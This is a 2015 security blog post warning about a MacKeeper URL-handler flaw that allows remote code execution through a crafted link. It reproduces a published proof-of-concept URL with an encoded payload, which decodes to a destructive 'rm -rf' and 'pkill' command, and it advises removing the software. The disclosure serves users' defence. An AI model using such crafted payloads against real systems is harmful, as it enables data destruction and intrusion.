Serious MacKeeper vulnerability found
Published May 9th, 2015 at 7:21 AM EST , modified May 9th, 2015 at 7:21 AM EST
I have long advised against using MacKeeper for a variety of reasons (some of which can be found in Ongoing MacKeeper fraud). However, now there’s a new reason to avoid MacKeeper: it has been found to contain a serious vulnerability that can lead to remote code execution through the use of a malicious URL. In non-tech-speak, a hacker can create a link that will, if clicked, result in MacKeeper executing code embedded within the link! Such code could do things like wiping your hard drive clean, uploading data to a remote server, or downloading and installing malware.
This is a very serious issue, and now that a proof-of-concept has been published, users of MacKeeper are at high risk of attack. No malicious MacKeeper URLs have yet been spotted in the wild, but hackers have the blueprints now, so it’s undoubtedly just a matter of time.
The attack is quite simple, unfortunately. Take a look at the proof-of-concept (PoC) URL released by Braden Thomas:
com-zeobit-command:///i/ZBAppController/performActionWithHelperTask: arguments:/ BAtzdHJlYW10eXBlZIHoA4QBQISEhAhOU1N0cmluZwGEhAhOU09iamVjdACFhAErBk5TVGFz a4aShISEDE5TRGljdGlvbmFyeQCUhAFpA5KEk5UJQVJHVU1FTlRThpKEhIQHTlNBcnJheQCU lwKShJOVAi1jhpKEk5U4cm0gLXJmIC9BcHBsaWNhdGlvbnMvTWFjS2VlcGVyLmFwcDtwa2ls bCAtOSAtYSBNYWNLZWVwZXKGhpKEk5UGUFJPTVBUhpKEk5UzWW91ciBjb21wdXRlciBoYXMg bWFsd2FyZSB0aGF0IG5lZWRzIHRvIGJlIHJlbW92ZWQuhpKEk5ULTEFVTkNIX1BBVEiGkoST lQcvYmluL3NohoY=
This PoC will execute the following command:
rm -rf /Applications/MacKeeper.app;pkill -9 -a MacKeeper
One may wonder who in their right minds would click on a link looking like that. However, in Mr. Thomas’ tweet containing the PoC, this URL was hidden behind a shortened tinyurl.com URL. Such link shortening can easily be used to disguise a maliciously-crafted link, and has proven to be an effective method for tricking people into clicking on links that they otherwise would not.
Those who have MacKeeper installed have a new, and very serious, reason to remove the software as soon as possible! To do so, follow the instructions on Phil Stokes’ page on removing MacKeeper, or use his DetectX app to find and remove all components of MacKeeper automatically.